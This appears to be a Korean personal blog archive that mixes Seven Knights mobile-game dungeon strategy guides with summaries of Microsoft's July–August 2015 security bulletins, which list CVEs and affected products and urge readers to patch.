그렇다고 스파이크를 데려가기에는 극공덱이름이 아깝죠 ㅠㅠ


링링은 크게 조심해야 할 건 없지만 3인스킬이 꽤나 아픕니다.

그래서 면역케릭을 데리고 가면 좀 편하죠^^



플스는 아래와 같이 공격형 형식으로 선택을 했다.

게임에서 정해주는 "공격형 설정" 은 아니니 헷갈리지 말길~!!






덱은 비담 보진 // 소교, 델론즈, 에이스, 아일린 로 구성했습니다.

영웅 별 렙은 아래 써있으니 패스하도록 하자~!!




스킬트리는 아래와 같습니다.


1 라운드 : 비담의 극속공으로 1~2마리는 잡고 비담 3인스킬 "거궁신포" 로 마무리


2 라운드 : 상대방의 속공격을 견디고, 바로 비담의 4인 스킬 " 태전포화"로 마무리

(상대영웅 중 무송의 "기절" 스킬을 비담이 맞았을 경우에는 다시 하는게 정신건강 상 이로움;;;)


3 라운드 : 상대방의 속공격을 견디고, 바로 델론즈 침묵 스킬 "사신강림"으로 침묵 시켜두고 

           돌아오는 비담의 3인 스킬 "거궁신포"로 마무리



위 내용을 간략하게 정리 해드리겠습니다.


1라 : 비담 속속 -> 비담 3인 스킬 -> 마무리

2라 : 비담 4인 스킬 -> 마무리

3라 : 델론즈 침묵 -> 비담 3인 스킬 -> 마무리


오늘도 참 쉽죠~!!?







블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



2015년 8월 19일 마이크로소프트의 MS15-093 긴급 업데이트 가 발표되었다.


긴급 업데이트 내용은 Microsoft Internet Explorer 7, 8, 9, 10, 11 웹 브라우저에서 새로운 메모리 손상 취약점(CVE-2015-2502)을 

통한 원격코드 실행이 가능한 보안 취약점에 대한 패치이다.


특히 MS15-093 보안패치에 대한 메모리 손상 취약점(CVE-2015-2502)에 대한 악성코드도 활동 중이니

꼭 긴급 업데이트를 받길 바란다.


※ 아래의 링크를 클릭하면 해당 취약점에 대한 정보를 볼 수 있다.

1. MS15-093 (긴급) : Internet Explorer용 보안 업데이트(3088903)


이 보안 업데이트는 Internet Explorer의 취약성을 해결합니다. 사용자가 Internet Explorer를 사용하여 특수 제작된 웹 페이지를 볼 경우 이 취약성으로 인해 원격 코드 실행이 허용될 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 사용자 권한을 얻을 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.


이 보안 업데이트의 심각도는 영향받는 Windows 클라이언트의 Internet Explorer 7(IE 7), Internet Explorer 8(IE 8), Internet Explorer 9(IE 9), Internet Explorer 10(IE 10) 및 Internet Explorer 11(IE 11)에 대해 긴급이며 영향받는 Windows 서버의 Internet Explorer 7(IE 7), Internet Explorer 8(IE 8), Internet Explorer 9(IE 9), Internet Explorer 10(IE 10) 및 Internet Explorer 11(IE 11)에 대해 보통입니다. 자세한 내용은 영향받는 소프트웨어 절을 참조하십시오.


이 보안 업데이트는 Internet Explorer가 메모리의 개체를 처리하는 방식을 수정하여 취약성을 해결합니다.


영향을 받는 소프트웨어 :

- Internet Explorer 7

- Internet Explorer 8

- Internet Explorer 9

- Internet Explorer 10

- Internet Explorer 11

(Windows10 브라우저인 Edge 브라우저는 영향 받지 않습니다.)


취약점 : 

- 메모리 손상 취약점 (CVE-2015-2502)



※ 악성코드가 확인 된 보안 업데이트이기 때문에 꼭 패치하시길 바란다!!




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



마이크로소프트(Microsoft)에서 매월 정기적으로 제공하는 2015년 8월 정기 보안 업데이트가 발표 되었습니다.

(이미 일주나 지나버렸지만...늦게라도 포스팅을 ㅠㅠ 아흑!!)


※ 이제 시작 된 Windows 10 보안업데이트, 그리고 차세대 브라우저 Microsoft Edge 의 취약점 역습이 시작 될 듯 ㅎㅎ


이번 업데이트에서는Microsoft Windows, Internet Explorer, Microsoft Edge, Microsoft .NET Framework, Microsoft Office, 

Microsoft Lync, Microsoft Silverlight, Microsoft Server 제품군에서 발견된 보안취약점(58건)을 해결한 

14건의 보안 패치(긴급 4, 중요 10)로 이루어져 있습니다.



※ 최신 버전이 아닌 상태에서 해당 제품 사용시 "공개된 취약점을 이용한 신종 악성코드" 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 아래의 해결책을 참고해서 최신 버전으로 업데이트 후 사용바랍니다.

※ 아래의 링크를 클릭하면 해당 취약점에 대한 정보를 볼 수 있다.

1. MS15-079 (긴급) : Internet Explorer용 누적 보안 업데이트(3082442)

이 보안 업데이트는 Internet Explorer의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 Internet Explorer를 사용하여 특수 제작된 웹 페이지를 볼 경우 원격 코드 실행을 허용할 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 권한을 얻을 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- 다양한 메모리 손상 취약성:

  CVE-2015-2441, CVE-2015-2442, CVE-2015-2443, CVE-2015-2444, CVE-2015-2446

  CVE-2015-2447, CVE-2015-2448, CVE-2015-2450, CVE-2015-2451, CVE-2015-2452



2. MS15-080 (긴급) : Microsoft 그래픽 구성 요소의 취약성으로 인한 원격 코드 실행 문제(3078662) 

이 보안 업데이트는 Microsoft Windows, Microsoft .NET Framework, Microsoft Office, Microsoft Lync 및 Microsoft Silverlight의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 문서를 열거나 포함된 트루타입 또는 OpenType 글꼴이 있는 신뢰할 수 없는 웹 페이지를 방문하는 경우 원격 코드 실행을 허용할 수 있습니다.

- 다양한 OpenType 글꼴 구문 분석 취약성:

  CVE-2015-2432, CVE-2015-2458, CVE-2015-2459, CVE-2015-2460, CVE-2015-2461, CVE-2015-2462



3. MS15-081 (긴급) : Microsoft Office의 취약성으로 인한 원격 코드 실행 문제(3080790)

이 보안 업데이트는 Microsoft Office의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 Microsoft Office 파일을 열 경우 원격 코드 실행을 허용할 수 있습니다. 이러한 취약성 악용에 성공한 공격자는 현재 사용자의 컨텍스트에서 임의의 코드를 실행할 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- 다양한 Microsoft Office 메모리 손상 취약성:

  CVE-2015-1642, CVE-2015-2467, CVE-2015-2468, CVE-2015-2469, CVE-2015-2477 

- 안전하지 않은 명령줄 매개 변수 전달 취약성(CVE-2015-2423) 

- Microsoft Office 원격 코드 실행 취약성(CVE-2015-2466)

- Microsoft Office 정수 언더플로 취약성(CVE-2015-2470)



4. MS15-082 (중요) : RDP의 취약성으로 인한 원격 코드 실행 문제(3080348)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 공격자가 특수 제작된 DLL(동적 연결 라이브러리) 파일을 대상 사용자의 현재 작업 디렉터리에 먼저 넣은 다음 사용자에게 신뢰할 수 있는 DLL 파일을 로드하는 대신 공격자의 특수 제작된 DLL 파일을 로드하도록 디자인된 프로그램을 실행하거나 RDP(원격 데스크톱 프로토콜) 파일을 열도록 유도하는 경우 원격 코드 실행을 허용할 수 있습니다. 이 취약성 악용에 성공한 공격자는 영향받는 시스템을 완전히 제어할 수 있습니다. 이렇게 되면 공격자가 프로그램을 설치하거나, 데이터를 보거나 변경하거나 삭제하거나, 모든 사용자 권한이 있는 새 계정을 만들 수 있습니다.

- 원격 데스크톱 세션 호스트 스푸핑 취약성(CVE-2015-2472)

- 원격 데스크톱 프로토콜 DLL 플랜팅 원격 코드 실행 취약성(CVE-2015-2473)



5. MS15-083 (중요) : 서버 메시지 블록의 취약성으로 인한 원격 코드 실행 문제(3073921)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 SMB 서버 오류 로깅에 특수 제작된 문자열을 보낼 경우 이 취약성으로 인해 원격 코드 실행이 허용될 수 있습니다.

- 서버 메시지 블록 메모리 손상 취약성(CVE-2015-2474)



6. MS15-084 (중요) : XML Core Services의 취약성으로 인한 정보 유출 문제(3080129)

이 보안 업데이트는 Microsoft Windows 및 Microsoft Office의 취약성을 해결합니다. 이 취약성은 사용자가 특수 제작된 링크를 클릭하는 경우 메모리 주소를 노출하거나, SSL(Secure Sockets Layer) 2.0 사용을 명시적으로 허용함으로써 정보 유출을 허용할 수 있습니다. 하지만 어떠한 경우에도 공격자는 강제로 사용자가 특수 제작된 링크를 클릭하도록 만들 수 없습니다. 공격자는 일반적으로 전자 메일 또는 인스턴트 메신저 메시지에서 유인물을 이용하여 사용자가 이 링크를 클릭하도록 유도해야 합니다.

- 다양한 MSXML 정보 유출 취약점:

  CVE-2015-2434, CVE-2015-2471

- MSXML 정보 유출 취약성(CVE-2015-2440)



7. MS15-085 (중요) : Mount Manager의 취약성으로 인한 권한 상승 문제(3082487) 

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 대상 시스템에 악성 USB 장치를 삽입하는 경우 이 취약성으로 인해 권한 상승이 허용될 수 있습니다. 그런 다음 공격자는 악성 바이너리를 디스크에 쓰고 실행할 수 있습니다.

- Mount Manager 권한 상승 취약성(CVE-2015-1769)



8. MS15-086 (중요) : System Center Operations Manager의 취약성으로 인한 권한 상승 문제(3075158)

이 보안 업데이트는 Microsoft System Center Operations Manager의 취약성을 해결합니다. 이 취약성으로 인해 사용자가 특수 제작된 URL을 통해 영향을 받는 웹 사이트를 방문할 경우 권한 상승이 허용될 수 있습니다. 공격자는 강제로 사용자가 이러한 웹 사이트를 방문하도록 만들 수 없습니다. 대신 공격자는 사용자가 전자 메일 메시지 또는 인스턴트 메신저 메시지의 링크를 클릭하여 영향을 받는 웹 사이트를 방문하도록 유도하는 것이 일반적입니다.

- System Center Operations Manager 웹 콘솔 XSS 취약성(CVE-2015-2420)



9. MS15-087 (중요) : UDDI 서비스의 취약성으로 인한 권한 상승 문제(3082459)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 웹 페이지 검색 매개 변수에 악성 스크립트를 삽입하여 XSS(교차 사이트 스크립팅) 시나리오를 엔지니어링한 경우 이 취약성으로 인해 권한 상승이 허용될 수 있습니다. 그러면 악성 스크립트가 실행되는 특수 제작된 웹 페이지에 사용자가 방문하게 됩니다.

- UDDI 서비스 권한 상승 취약성(CVE-2015-2475)



10. MS15-088 (중요) : 안전하지 않은 명령줄 매개 변수 전달로 인한 정보 유출 문제(3082458)

이 보안 업데이트는 Microsoft Windows, Internet Explorer 및 Microsoft Office의 정보 유출 취약성을 해결합니다. 이 취약성을 악용하기 위해 공격자는 먼저 Internet Explorer의 다른 취약성을 사용하여 샌드박스 프로세스에서 코드를 실행해야 합니다. 그런 다음 공격자는 안전하지 않은 명령줄 매개 변수로 메모장, Visio, PowerPoint, Excel 또는 Word를 실행하여 정보 유출이 일어나게 할 수 있습니다. 이 취약성으로부터 보호하기 위해 고객은 이 공지에서 제공되는 업데이트뿐만 아니라 MS15-079에서 제공되는 Internet Explorer용 업데이트도 적용해야 합니다. 마찬가지로, 영향받는 Microsoft Office 제품을 실행하는 고객은 MS15-081에서 제공되는 적용 가능한 업데이트도 설치해야 합니다.

- 안전하지 않은 명령줄 매개 변수 전달 취약성(CVE-2015-2423)



11. MS15-089 (중요) : WebDAV의 취약성으로 인한 정보 유출 문제(3076949)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 SSL 2.0이 사용되는 WebDAV 서버에 암호화된 SSL(Secure Socket Layer) 2.0 세션을 강제로 적용하고 메시지 가로채기(man-in-the-middle) 공격을 사용하여 암호화된 트래픽의 일부를 암호 해독하는 경우 이 취약성으로 인해 정보 유출이 허용될 수 있습니다. 

- WebDAV 클라이언트 정보 유출 취약성(CVE-2015-2476)



12. MS15-090 (중요) : Microsoft Windows의 취약성으로 인한 권한 상승 문제(3060716)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 영향받는 시스템에 로그온한 후 특수 제작된 응용 프로그램을 실행하거나 사용자에게 취약한 샌드박스 응용 프로그램을 호출하는 특수 제작된 파일을 열도록 유도할 경우 이 취약성으로 인해 권한 상승이 허용될 수 있고, 이로 인해 공격자는 샌드박스를 이스케이프할 수 있습니다.

- Windows 개체 관리자 권한 상승 취약성(CVE-2015-2428)

- Windows 레지스트리 권한 상승 취약성(CVE-2015-2429)

- Windows 파일 시스템 권한 상승 취약성(CVE-2015-2430)



13. MS15-091 (긴급) : Microsoft Edge용 누적 보안 업데이트(3084525)

이 보안 업데이트는 Microsoft Edge의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 Microsoft Edge를 사용하여 특수 제작된 웹 페이지를 볼 경우 원격 코드 실행을 허용할 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 권한을 얻을 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- 다양한 메모리 손상 취약성:

  CVE-2015-2441, CVE-015-2442, CVE-015-2446

- ASR 우회 취약성(CVE-2015-2449) 



14. MS15-092 (중요) : .NET Framework의 취약성으로 인한 권한 상승 문제(3086251)

이 보안 업데이트는 Microsoft .NET Framework의 취약성을 해결합니다. 사용자가 특수 제작된 .NET 응용 프로그램을 실행할 경우 이 취약성으로 인해 권한 상승이 허용될 수 있습니다. 하지만 어떠한 경우에도 공격자는 강제로 사용자가 이 응용 프로그램을 실행하도록 만들 수 없습니다. 공격자는 사용자가 이렇게 하도록 유도해야 합니다.

- 다양한 RyuJIT 최적화 권한 상승 취약성:

  CVE-2015-2479, CVE-2015-2480, CVE-2015-2481




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




국내 게임 유명 게임회사인 넷마블게임즈에서 개발한 모바일 액션 RPG 게임 "세븐나이츠"의 컨텐츠 중의 

하나 인 요일 던전에 대해서 공략을 해보려 한다.


우선 요일던전이란건 월,화,수,목,금,토,일 에 해당하는 던전이다.

각 요일마다, 쉬움, 보통, 어려움, 극악의 난이도를 선택 하여 클리어 시 원하는 원소를 획득 할 수 있는 컨텐츠 이다.



물론 보상은 각각 다르다.

쉬움 난이도에서는 1성 원소

보통 난이도에서는 2성 원소

어려움 난이도에서는 3성 원소

극악 난이도에서는 4성 원소를 획득 할 수 있다.


보편적으로 세븐나이츠를 시작하고 약 2주일 정도면, 어려움까지는 무리없이 깰 수 있지만

극악 던전은 어느정도 덱(파티)가 꾸려져야 할 수 있기 때문에 최대한 쉬운 방법으로 다들 극악 난이도를 

클리어하려고 난리다 ㅠㅠ



"내가 공략하는 방법이 정답은 아니다.
다만, 쉽게 할 수 있는 방법도 모를 수 있는 분들이 있기에 방법을 제시하는 것이기 때문에 태글 걸지 말자!!"



오늘 공략 할 던전은 바로 목요일 던전이다. 

목요일 극악 난이도는 위에 보이듯이 조커, 세인, 손오공 영웅으로 이루어져 있으며, 클리어시 암흑 4성 원소를 획득 가능하다.


플스는 아래와 같이 공격형 형식으로 선택을 했다.

게임에서 정해주는 "공격형 설정" 은 아니니 헷갈리지 말길~!!





덱은 파스칼 보진 // 여포, 태오, 에이스, 델론즈 로 구성했습니다.

영웅 별 렙은 아래 써있으니 패스하도록 하자~!!




스킬트리는 아래와 같습니다.


1 라운드(조커) : 파스칼 치명 속속으로 조커가 죽는 경우가 많습니다.
(만약 죽지 않는다면, 에이스나 델론즈의 단타 스킬로 죽이면 됩니다.)

2 라운드(세인) : 2라가 시작되면 세인이 선타를 가져가고, 여포에게 공격을 합니다.
이후 턴이 오면, 여포 "적토질풍격" 턴감 스킬로 세인의 면역을 해제 시킨 후에 파스칼 "파괴의 거인" 으로 마무리

3 라운드(손오공) : 3라가 시작되면 손오공이 먼저 2인 이나 3인을 먼저 쓰게 되는데, 2인을 쓰게 되면 운이 좋은겁니다.
이후 턴이 오면, 파스칼 "어둠의 문"으로 스킬을 재장전 후 바로 "파괴의 거인" 으로 마무리

3 라운드(손오공 부활 후) : 손오공이 부활 후 스킬을 쓰면 에이스, 델론즈는 대부분 죽을 겁니다.
신경쓰지 마시고, 태오의 "흑익 만월참" 턴감 스킬로 손오공 분신들 제거
그리고, 스칼 "어둠의 문"으로 스킬을 재장전 후 바로 "파괴의 거인" 으로 마무리


위 내용을 간략하게 정리 해드리겠습니다.


1라 : 파스칼 속속 -> 마무리


2라 : 여포 턴감 스킬 -> 파스칼 거인 스킬 -> 마무리


3라 : 파스칼 면역 스킬 -> 파스칼 거인 스킬 -> 마무리

3라 (손오공 부활 후 ) : 태오 턴감 스킬 -> 파스칼 면역 스킬 -> 파스칼 거인 스킬 -> 마무리







블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




국내 게임 유명 게임회사인 넷마블게임즈에서 개발한 모바일 액션 RPG 게임 "세븐나이츠"의 새로운 이야기를 여는

세븐나이츠 시즌2를 금일 7월 23일 업데이트 하였다.


나도 세븐나이츠를 하는 입장에서, 아주 즐거운 소식이였다 ㅎㅎ


시즌2를 업데이트 하면서 이벤트도 아주 풍성해졌다!!

그 중에 가장 눈에 띄는건 역시 "6성 사황 소환권"을 준다는 것이다~!!


세븐나이츠를 하는 사람들이라면 게임 내에서 사황을 획득하는 것이 얼마나 어려운지 잘 알것이다 ㅠㅠ


이번에 시즌2를 업데이트 하면서 TV CF도 이상한 콧수염난 사람이 아닌, 이순재 선생님으로 변경되었다.

(이건 참 잘한 일!!!)




자!! 그럼 본론으로 넘어가서 "6성 사황 소환권"을 받는 방법에 대해서 알아보자.

사황 소환권을 받기 위해서는 추천왕 이벤트 참여자수가 10만명이 넘어야 한다.


그래서 추천왕 이벤트에 참여하는 방법에 대해 알아야 한다.


아래의 링크를 클릭하면 추천왕 이벤트를 할 수 있는 페이지가 나온다.


<추천왕 이벤트 페이지> <- 클릭하세요


이 곳에는 추천왕 이벤트를 2가지를 할 수 있다.


내가 추천왕으로 등록해서 이벤트를 하는 방법과, 제가 드린 링크에서 "친구추천 인증하기" 를 통해 이벤트에 참여 가능하다.


현재 추천왕 참여인원이 10만명이 넘었으니, "친구 추천 인증하기" 를 통해 루비100개라도 받는게 좋을 듯 하다.


물론, 해당 링크는 저의 추천왕 링크라서 저를 추천왕으로 추천을 해주는 겸용도 됩니다!!


아래와 같이 친구추천 인증하기에서 인증번호만 받으면 "루비 100개" 가 똮악~!!!



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



2015년 7월 21일 마이크로소프트의 긴급 업데이트가 발표되었다.


긴급 업데이트 내용은 이번달 2015년 7월 정기 보안 업데이트에서 발표 된 MS15-077(KB3077657)에 보강 된 

긴급 보안 업데이트이다.


특히 MS15-078 보안패치에 대한 제로데이(0-Day) 보안 취약점(CVE-2015-2426)에 대한 악성코드도 활동 중이니

꼭 긴급 업데이트를 받길 바란다.

(그 놈의 Hacking Team 때문에 나라가 시끄럽다 ㅅㅂㄴㄷ!!!)


※ 아래의 링크를 클릭하면 해당 취약점에 대한 정보를 볼 수 있다.

이 보안 업데이트는 Microsoft Windows 의 취약성을 해결합니다. 이 취약성은 만일 사용자가 특수하게 조작된 문서를 열거나 또는 임베디드 오픈 타입 폰트가 포함된 신뢰할 수 없는 웹페이지를 방문할 경우 원격 코드를 실행시킬 수 있습니다. 

이 보안 업데이트는 Windows Adobe Type Manager(ATM) 라이브러리가 오픈 타입 폰트를 처리하는 방식을 수정하여 취약성을 해결합니다.

영향을 받는 소프트웨어:
- Windows Vista
- Windows Server 2008
- Windows 7
- Windows Server 2008 R2
- Windows 8
- Windows 8.1
- Windows Server 2012
- Windows Server 2012 R2
- Windows RT
- Windows RT 8.1
- Server Core 설치

취약점 : 
- OpenType Font Driver Vulnerability (CVE-2015-2426)


 
※ 악성코드가 확인 된 보안 업데이트이기 때문에 꼭 패치하시길 바란다!!




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



마이크로소프트(Microsoft)에서 매월 정기적으로 제공하는 2015년 7월 정기 보안 업데이트가 발표 되었습니다.


이번 업데이트에서는 Microsoft Windows, Internet Explorer, Microsoft SQL Server, Microsoft Office 제품군에서 

발견된 보안취약점(59건)을 해결한 14건의 보안 패치(긴급 4, 중요 10)로 이루어져 있습니다.



※ 최신 버전이 아닌 상태에서 해당 제품 사용시 "공개된 취약점을 이용한 신종 악성코드" 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 아래의 해결책을 참고해서 최신 버전으로 업데이트 후 사용바랍니다.

※ 아래의 링크를 클릭하면 해당 취약점에 대한 정보를 볼 수 있다.

1. MS15-058 (중요) : SQL Server의 취약성으로 인한 원격 코드 실행 문제(3065718)

이 보안 업데이트는 Microsoft SQL Server의 취약성을 해결합니다. 가장 심각한 취약성은 인증된 공격자가 잘못된 주소에서 가상 함수를 실행하도록 디자인된 특수 제작된 쿼리를 실행하는 경우 원격 코드 실행을 허용할 수 있고, 초기화되지 않은 메모리에 대한 함수 호출로 이어질 수 있습니다. 이 취약성을 악용하려면 공격자에게 데이터베이스를 만들거나 수정하는 권한이 필요합니다.

- SQL Server의 권한 상승 취약점 (CVE-2015-1761)

- SQL Server의 원격 코드 실행 취약점 (CVE-2015-1762)

- SQL Server의 원격 코드 실행 취약점 (CVE-2015-1763)


2. MS15-065 (긴급) : Internet Explorer용 보안 업데이트(3076321)

이 보안 업데이트는 Internet Explorer의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 Internet Explorer를 사용하여 특수 제작된 웹 페이지를 볼 경우 원격 코드 실행을 허용할 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 권한을 얻을 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- VBScript 메모리 손상 취약성(CVE-2015-2372)

- Internet Explorer XSS 필터 우회 취약성(CVE-2015-2398)

- Internet Explorer 권한 상승 취약성(CVE-2015-2405)

- JScript9 메모리 손상 취약성(CVE-2015-2419)

- Internet Explorer ASLR 우회(CVE-2015-2421)

- 다양한 Internet Explorer의 메모리 손상 취약성:

  CVE-2015-1733, CVE-2015-1738, CVE-2015-1767, CVE-2015-2383, CVE-2015-2384

  CVE-2015-2385, CVE-2015-2388, CVE-2015-2389, CVE-2015-2390, CVE-2015-2391

  CVE-2015-2397, CVE-2015-2401, CVE-2015-2403, CVE-2015-2404, CVE-2015-2406

  CVE-2015-2408, CVE-2015-2411, CVE-2015-2422, CVE-2015-2425

- 다양한 Internet Explorer 정보 유출 취약성:

  CVE-2015-1729, CVE-2015-2410, CVE-2015-2412, CVE-2015-2413, CVE-2015-2414


3. MS15-066 (긴급) : VBScript 스크립팅 엔진의 취약성으로 인한 원격 코드 실행 문제(3072604)

이 보안 업데이트는 Microsoft Windows의 VBScript 스크립팅 엔진의 취약성을 해결합니다. 이 취약성으로 인해 사용자가 특수 제작된 웹 사이트를 방문할 경우 원격 코드 실행이 허용될 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 사용자 권한을 얻을 수 있습니다. 현재 사용자가 관리자 권한으로 로그온한 경우, 이 취약성을 악용한 공격자는 영향을 받는 시스템을 완전히 제어할 수 있습니다. 이렇게 되면 공격자가 프로그램을 설치하거나, 데이터를 보거나 변경하거나 삭제하거나, 모든 사용자 권한이 있는 새 계정을 만들 수 있습니다.

- VBScript 메모리 손상 취약성(CVE-2015-2372)


4. MS15-067 (긴급) : RDP의 취약성으로 인한 원격 코드 실행 문제(3073094)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 RDP(원격 데스크톱 프로토콜)가 사용되는 대상 시스템에 특수 제작된 패킷 시퀀스를 보내는 경우 이 취약성으로 인해 원격 코드 실행이 허용될 수 있습니다. 기본적으로 RDP는 모든 Windows 운영 체제에서 사용되도록 설정되지 않습니다. RDP가 사용되지 않는 시스템은 취약하지 않습니다.

- RDP(원격 데스크톱 프로토콜) 원격 코드 실행 취약성(CVE-2015-2373)


5. MS15-068 (긴급) : Windows Hyper-V의 취약성으로 인한 원격 코드 실행 문제(3072000)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. Hyper-V가 호스트하는 게스트 가상 컴퓨터에서 인증되고 권한을 가진 사용자가 특수 제작된 응용 프로그램을 실행하는 경우 이 취약성으로 인해 호스트 컨텍스트에서 원격 코드 실행이 허용될 수 있습니다. 공격자는 이 취약성을 악용하기 위해 게스트 가상 컴퓨터에 대한 유효한 로그온 자격 증명이 있어야 합니다.

- Hyper-V 버퍼 오버플로 취약성(CVE-2015-2361)

- Hyper-V 시스템 데이터 구조 취약성(CVE-2015-2362)


6. MS15-069 (중요) : Windows의 취약성으로 인한 원격 코드 실행 문제(3072631)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 특수 제작된 DLL(동적 연결 라이브러리) 파일을 대상 사용자의 현재 작업 디렉터리에 먼저 넣은 다음 사용자에게 신뢰할 수 있는 DLL 파일을 로드하는 대신 공격자의 특수 제작된 DLL 파일을 로드하도록 디자인된 프로그램을 실행하거나 RTF 파일을 열도록 유도하는 경우 이 취약성으로 인해 원격 코드 실행이 허용될 수 있습니다. 이 취약성 악용에 성공한 공격자는 영향받는 시스템을 완전히 제어할 수 있습니다. 이렇게 되면 공격자가 프로그램을 설치하거나, 데이터를 보거나 변경하거나 삭제하거나, 모든 사용자 권한이 있는 새 계정을 만들 수 있습니다.

- Windows DLL 원격 코드 실행 취약성(CVE-2015-2368)

- DLL 플랜팅 원격 코드 실행 취약성(CVE-2015-2369)


7. MS15-070 (중요) : Microsoft Office의 취약성으로 인한 원격 코드 실행 문제(3072620)

이 보안 업데이트는 Microsoft Office의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 Microsoft Office 파일을 열 경우 원격 코드 실행을 허용할 수 있습니다. 이러한 취약성 악용에 성공한 공격자는 현재 사용자의 컨텍스트에서 임의 코드를 실행할 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- Microsoft Office 메모리 손상 취약성(CVE-2015-2376)

- Microsoft Office 메모리 손상 취약성(CVE-2015-2377)

- Microsoft Office 메모리 손상 취약성(CVE-2015-2379)

- Microsoft Office 메모리 손상 취약성(CVE-2015-2380)

- Microsoft Office 메모리 손상 취약성(CVE-2015-2415)

- Microsoft Office 원격 코드 실행 취약성(CVE-2015-2424)

- Microsoft Excel ASLR 우회 취약성(CVE-2015-2375)

- Microsoft Excel DLL 원격 코드 실행 취약성(CVE-2015-2378)


8. MS15-071 (중요) : Netlogon의 취약성으로 인한 권한 상승 문제(3068457)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 대상 네트워크의 PDC(주 도메인 컨트롤러)에 대한 액세스 권한을 가진 공격자가 특수 제작된 응용 프로그램을 실행하여 BDC(백업 도메인 컨트롤러)로 PDC에 대한 보안 채널을 설정하는 경우 이 취약성으로 인해 권한 상승이 허용될 수 있습니다.

- Netlogon의 권한 상승 취약성(CVE-2015-2374)


9. MS15-072 (중요) : Windows 그래픽 구성 요소의 취약성으로 인한 권한 상승 문제(3069392)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. Windows 그래픽 구성 요소가 비트맵 변환을 제대로 처리하지 못하는 경우 이 취약성으로 인해 권한 상승이 허용될 수 있습니다. 이 취약성 악용에 성공한 인증된 공격자는 대상 시스템에서 권한을 상승시킬 수 있습니다. 이렇게 되면 공격자가 프로그램을 설치하거나, 데이터를 보거나 변경하거나 삭제하거나, 모든 관리자 권한이 있는 새 계정을 만들 수 있습니다. 공격자는 이 취약성을 악용하기 위해 먼저 시스템에 로그온해야 합니다.

- 그래픽 구성 요소 EOP 취약성(CVE-2015-2364)


10. MS15-073 (중요) : Windows 커널 모드 드라이버의 취약성으로 인한 권한 상승 문제(3070102)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 영향받는 시스템에 로그온한 후 특수 제작된 응용 프로그램을 실행하는 경우 이 취약성으로 인해 권한 상승이 허용될 수 있습니다.

- Win32k 권한 상승 취약성(CVE-2015-2363)

- Win32k 권한 상승 취약성(CVE-2015-2365)

- Win32k 권한 상승 취약성(CVE-2015-2366)

- Win32k 정보 유출 취약성(CVE-2015-2367)

- Win32k 정보 유출 취약성(CVE-2015-2381)

- Win32k 정보 유출 취약성(CVE-2015-2382)


11. MS15-074 (중요) : Windows Installer 서비스의 취약성으로 인한 권한 상승 문제(3072630)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. Windows Installer 서비스가 부적절하게 사용자 지정 작업 스크립트를 실행하는 경우 이 취약성으로 인해 권한 상승이 허용될 수 있습니다. 이 취약성을 악용하기 위해 공격자는 대상 시스템에 로그온한 사용자를 먼저 손상시켜야 합니다. 이렇게 되면 공격자가 프로그램을 설치하거나, 데이터를 보거나 변경하거나 삭제하거나, 모든 관리자 권한이 있는 새 계정을 만들 수 있습니다.

- Windows Installer EoP 취약성(CVE-2015-2371)


12. MS15-075 (중요) : OLE의 취약성으로 인한 권한 상승 문제(3072633)

